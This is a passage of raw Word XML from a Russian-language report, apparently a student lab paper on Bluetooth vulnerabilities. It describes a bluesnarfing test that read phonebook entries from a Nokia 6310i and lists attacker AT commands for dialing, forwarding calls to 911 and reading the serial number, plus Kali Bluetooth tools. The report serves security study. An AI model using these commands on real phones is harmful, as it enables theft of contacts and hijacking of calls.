      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Radio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Frequency</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Communication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tooltip="Эмуляция" w:history="1">
        <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
          <w:rPr>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>эмулирует</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
          <w:rPr>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>последовательные порты</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> поверх протокола </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tooltip="L2CAP" w:history="1">
        <w:r w:rsidR="002C2D56" w:rsidRPr="002C2D56">
          <w:rPr>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>L2CAP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F6140E" w:rsidRPr="00F208C0">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в недокументированной службе, которая позволяет злоумышленнику подключаться к устройству без проверки подлинности. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F208C0" w:rsidRDefault="00F208C0" w:rsidP="00F208C0">
      <w:r>
        <w:t xml:space="preserve">Инструмент </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bluesnarfer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B24AA">
        <w:t xml:space="preserve"> (Рисунок 7)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> реализует атаку </w:t>
      </w:r>
      <w:r w:rsidRPr="00F208C0">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">где злоумышленник может указать удаленную телефонную книгу (сохраненные номера, последние исходящие вызовы, последние входящие вызовы и т. д.) И извлекать, изменять или удалять результаты. Злоумышленник подключаясь к службе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RFCOMMвручную</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> с помощью средства эмуляции терминала может вводить ручные команды AT, такие как инициирование вызова («ATDT911»), переадресация всех вызовов на указанное номер (" AT + CCF911 ") или повторите вызов последнего номера (« ATDL »). Еще более потенциально полезная информация доступна для злоумышленника, включая электронный серийный номер телефона («AT + CGSN»).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5AA2" w:rsidRDefault="00CE5AA2" w:rsidP="00F208C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30E09B0E" wp14:editId="7008EC74">
            <wp:extent cx="3759075" cy="2723572"/>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4852" cy="2735003"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B24AA" w:rsidRDefault="004B24AA" w:rsidP="00F208C0">
      <w:r>
        <w:t>Рисунок 7 – команды утилиты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F208C0" w:rsidRPr="00CA6DC7" w:rsidRDefault="00F208C0" w:rsidP="00F208C0">
      <w:r>
        <w:t xml:space="preserve">Тестирование уязвимостей проводилось на телефоне </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nokia</w:t>
      </w:r>
      <w:r w:rsidRPr="00F208C0">
        <w:t xml:space="preserve"> 6310</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="002C2D56" w:rsidRPr="00012F72" w:rsidRDefault="002C2D56" w:rsidP="00F208C0">
      <w:r>
        <w:t xml:space="preserve">Были введены команды </w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:t xml:space="preserve">запроса записей 1-2 телефонной книги для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012F72">
        <w:t>устройсва</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012F72">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidR="00012F72" w:rsidRPr="00012F72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:t>адресом 00:02:</w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EE</w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00012F72" w:rsidRPr="00012F72">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00012F72" w:rsidRPr="00012F72">
        <w:t>72</w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00012F72" w:rsidRPr="00012F72">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="004B24AA">
        <w:t xml:space="preserve"> (Рисунок 8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D66195" w:rsidRDefault="002C2D56" w:rsidP="00D66195">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3837709" cy="115633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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="17171"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3860795" cy="1163291"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B24AA" w:rsidRDefault="004B24AA" w:rsidP="00D66195">
      <w:r>
        <w:t xml:space="preserve">Рисунок 8 – результат работы утилиты </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F208C0" w:rsidRDefault="00F208C0" w:rsidP="00D66195">
      <w:r>
        <w:t xml:space="preserve">С </w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:t>помощью</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> этой уязвимости мы смогли получить доступ к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>телефоной</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> книге устройства </w:t>
      </w:r>
      <w:r w:rsidR="00F6140E">
        <w:t>.Этой ,и большинства других уязвимостей</w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F6140E">
        <w:t xml:space="preserve">,реализуемых в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F6140E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bluediving</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F6140E">
        <w:t xml:space="preserve"> лишены современные устройства</w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:t>(Рисунок 9)</w:t>
      </w:r>
      <w:r w:rsidR="00F6140E">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE5AA2" w:rsidRDefault="005E1C00" w:rsidP="00D66195">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5906AA46" wp14:editId="24815C98">
            <wp:extent cx="5219700" cy="904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904875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24283" w:rsidRDefault="00C24283" w:rsidP="00D66195">
      <w:r>
        <w:t xml:space="preserve">Рисунок 9 – отсутствие уязвимости на новом устройстве </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012F72" w:rsidRPr="00012F72" w:rsidRDefault="00685E0E" w:rsidP="00012F72">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc503991016"/>
      <w:r>
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidR="0095726D" w:rsidRPr="00731F50">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:t xml:space="preserve">Уязвимости современных </w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidR="00012F72" w:rsidRPr="00012F72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00012F72">
        <w:t>устройств</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidR="00012F72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6140E" w:rsidRDefault="00012F72" w:rsidP="00012F72">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Обнаружение скрытых устройств </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE711D" w:rsidRPr="00C24283" w:rsidRDefault="00012F72" w:rsidP="00012F72">
      <w:r>
        <w:t xml:space="preserve">Была установлена система </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00012F72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="0007435A" w:rsidRPr="0007435A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0007435A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="0007435A" w:rsidRPr="0007435A">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00012F72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>имеющая множество утилит для тестирования безопасности</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:t>. (Рисунок 10)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE711D" w:rsidRDefault="00CE711D" w:rsidP="00C24283">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bluelog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: инструмент </w:t>
      </w:r>
      <w:r w:rsidR="007A69B8">
        <w:t xml:space="preserve">для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A69B8">
        <w:t>логирования</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Он</w:t>
      </w:r>
      <w:r w:rsidR="007A69B8">
        <w:t xml:space="preserve">а сканирует радиоканал </w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы найти в н</w:t>
      </w:r>
      <w:r w:rsidR="007A69B8">
        <w:t>ем</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обнаруживаемы</w:t>
      </w:r>
      <w:r w:rsidR="007A69B8">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устройств</w:t>
      </w:r>
      <w:r w:rsidR="007A69B8">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t>, а затем запис</w:t>
      </w:r>
      <w:r w:rsidR="007A69B8">
        <w:t>ать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> их в файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE711D" w:rsidRDefault="00CE711D" w:rsidP="00C24283">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bluemaho</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: набор инструментов для проверки безопасности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-устройств на основе графического интерфейса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE711D" w:rsidRDefault="00CE711D" w:rsidP="00C24283">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Blueranger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: простой скрипт </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, который использует </w:t>
      </w:r>
      <w:r w:rsidR="007A69B8">
        <w:t>i2cap</w:t>
      </w:r>
      <w:r w:rsidR="007A69B8" w:rsidRPr="007A69B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A69B8" w:rsidRPr="00C24283">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для поиска устройств </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и определения их приблизительных расстояний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE711D" w:rsidRDefault="00CE711D" w:rsidP="00C24283">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Btscanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: этот инструмент, основанный на графическом интерфейсе, сканирует обнаруженные устройства в радиусе действия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE711D" w:rsidRDefault="00CE711D" w:rsidP="00C24283">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Redfang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: этот инструмент позволяет найти скрытое устройство </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012F72" w:rsidRDefault="00CE711D" w:rsidP="00C24283">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spooftooph</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: Это инструмент для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>спуфинга</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00012F72" w:rsidRPr="00012F72">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012F72" w:rsidRDefault="00012F72" w:rsidP="00012F72">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012F72" w:rsidRDefault="00012F72" w:rsidP="0007435A">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00012F72">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5A398A" wp14:editId="334794CC">
            <wp:extent cx="4589145" cy="2301871"/>
            <wp:effectExtent l="0" t="0" r="190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740" t="38947"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4589567" cy="2302083"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24283" w:rsidRDefault="00C24283" w:rsidP="0007435A">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 10 – доступные утилиты</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0007435A" w:rsidRPr="00012F72" w:rsidRDefault="0007435A" w:rsidP="0007435A">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0007435A" w:rsidRDefault="0007435A" w:rsidP="003C1FBB">
      <w:pPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Были настроены драйверы сетевой платы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intel</w:t>
      </w:r>
      <w:r w:rsidRPr="0007435A">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">и включен адаптер </w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">консольными </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>командами</w:t>
      </w:r>
      <w:r w:rsidR="00C24283">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Рисунок 11)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0007435A" w:rsidRPr="0007435A" w:rsidRDefault="0007435A" w:rsidP="0007435A">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007435A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="0007435A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0007435A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="0007435A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0007435A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0007435A" w:rsidRDefault="0007435A" w:rsidP="0007435A">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0007435A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hciconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0007435A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hci0 up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0007435A" w:rsidRDefault="003F5C29" w:rsidP="00C24283">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44447B08" wp14:editId="35B6E188">
            <wp:extent cx="5505450" cy="10001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1000125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C24283" w:rsidRPr="00C24283" w:rsidRDefault="00C24283" w:rsidP="00C24283">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Рисунок 11 – включение адаптера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009144BE" w:rsidRDefault="0007435A" w:rsidP="003C1FBB">
      <w:pPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Используя утилиту </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redfang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
